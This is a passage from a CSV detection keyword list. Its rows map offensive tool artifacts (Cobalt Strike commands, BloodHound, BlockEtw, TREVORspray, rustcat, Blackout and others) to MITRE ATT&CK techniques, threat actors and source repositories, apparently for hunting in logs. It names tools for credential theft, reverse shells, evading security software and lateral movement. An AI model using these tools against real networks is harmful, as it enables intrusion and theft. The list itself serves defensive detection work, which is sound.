T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bkerberos_ticket_use*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bkeylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bkkgdjpomdnfemhhkalfkogckjdkcjkg*","greyware_tool_keyword","VPNMatic","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*blackarch/tree/master/packages/rustcat*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*blackarrowsec/mssqlproxy*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" +"*blackarrowsec/pivotnacci*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*blackhat-arsenal-tools*","offensive_tool_keyword","Github Username","This github account maps to the Black Hat Arsenal tools since its inception in 2011. For readibility. the tools are classified by category and not by session.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/toolswatch/blackhat-arsenal-tools","1","0","N/A","N/A","10","3547","1140","2023-08-14T03:46:11Z","2017-07-21T08:03:44Z" +"*blacklanternsecurity/MANSPIDER*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*blacklanternsecurity/trevorproxy*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*blacklanternsecurity/TREVORspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*Blackout.exe *","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*ble_recon.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*blendin/3snake*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - 
T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*blindSQLPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*blockchain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*blockdlls -*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*blockdlls start*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 
- T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*blockdlls stop*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*blocketw.bin*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*blocketw.csproj*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*blocketw.exe*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*blocketw.pdb*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*BlockEtw-master*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*BlockOpenHandle.cpp*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" +"*BlockOpenHandle.exe*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" +"*BlockOpenHandle.vcxproj*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" +"*BlockOpenHandle-main*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" +"*bloginuser*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*blogonpasswords*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*bloodhound &> /dev/null &*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*bloodhound 
--no-sandbox*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*BloodHound-*.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*bloodhound.ad.*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*bloodhound.bin*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. 
Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*bloodhound.enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*BloodHound.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*bloodhound.py *","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*bloodhound.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*bloodhound.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*bloodhound_output*/dev/null*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*bloodhound_output_dconly_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*BloodHoundAD*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. 
with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*BloodHoundAD*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*BloodHoundGraphToGoFetchPath*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z"
+"*bloodhound-import -du neo4j -dp *.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*BloodHound-master*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*BloodHound-modified.ps1*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*bloodhound-python*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*bloodhound-quickwin -u * -p *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*bloodhound-quickwin-main*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z"
